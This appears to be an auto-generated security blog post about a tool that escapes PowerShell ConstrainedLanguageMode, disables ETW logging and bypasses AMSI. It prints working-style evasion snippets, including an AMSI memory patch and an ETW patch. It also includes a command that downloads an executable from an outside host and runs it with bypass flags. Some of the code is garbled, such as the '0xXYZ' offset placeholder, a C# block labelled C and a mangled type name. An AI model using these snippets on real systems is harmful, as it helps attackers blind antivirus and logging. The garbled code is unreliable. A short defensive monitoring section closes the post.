Listen to this Post

The cybersecurity community is buzzing about a powerful new tool that can break out of ConstrainedLanguageMode, disable userland ETW (Event Tracing for Windows), and bypass AMSI (Antimalware Scan Interface)—all while being signed by Microsoft. This multi-functional tool is a game-changer for red teamers and security researchers.
You Should Know:
1. Breaking ConstrainedLanguageMode
ConstrainedLanguageMode in PowerShell restricts script execution to prevent malicious activity. Escaping it allows full PowerShell functionality.
Commands to Check & Escape ConstrainedLanguageMode:
Check current language mode
$ExecutionContext.SessionState.LanguageMode
Attempt to bypass (common methods)
[System.Environment]::SetEnvironmentVariable('__PSLockdownPolicy', '0', 'Machine')
2. Disabling Userland ETW
ETW logs security events. Disabling it can evade detection.
Code to Patch ETW:
// C ETW patch (example)
using System;
using System.Runtime.InteropServices;
public class ETWBypass {
[DllImport("ntdll.dll")]
private static extern IntPtr RtlGetCurrentPeb();
public static void DisableETW() {
var peb = RtlGetCurrentPeb();
var etwAddr = peb + 0xXYZ; // Offset varies per OS
Marshal.WriteInt64(etwAddr, 0x0);
}
}
3. Bypassing AMSI
AMSI scans PowerShell scripts for malicious content. Bypassing it allows execution of blocked scripts.
PowerShell AMSI Bypass:
Memory patch AMSI
$a = [bash].Assembly.GetType('System.Management.Automation.AmsiUtils')
$f = $a.GetField('amsiInitFailed', 'NonPublic,Static')
$f.SetValue($null, $true)
4. Using the All-in-One Tool
The tool mentioned in the post combines these techniques. Always test in a controlled environment.
Example Usage:
Download and execute (hypothetical) Invoke-WebRequest -Uri "https://shells.systems/tool.exe" -OutFile "C:\tool.exe" Start-Process "C:\tool.exe" -ArgumentList "--bypass-amsi --disable-etw"
What Undercode Say
This tool demonstrates the evolving cat-and-mouse game in cybersecurity. While useful for penetration testers, attackers can misuse it. Defenders should monitor:
– Unusual PowerShell activity
– ETW service disruptions
– AMSI bypass attempts
Defensive Commands (Windows):
Log ETW events wevtutil qe Security /q:"[System[EventID=4688]]" /f:text Check AMSI status Get-MpComputerStatus | Select AMSIServiceEnabled
Linux Equivalent (Auditd):
Monitor process execution sudo auditctl -a always,exit -F arch=b64 -S execve
Expected Output:
A successful bypass will allow unrestricted script execution, while defenders will see logs indicating tampering.
Prediction
As Microsoft enhances security, bypass techniques will grow more sophisticated. Expect more tools combining multiple evasion methods in a single package.
Reference:
shells.systems (Original tool link)
References:
Reported By: Activity 7331284172826624002 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


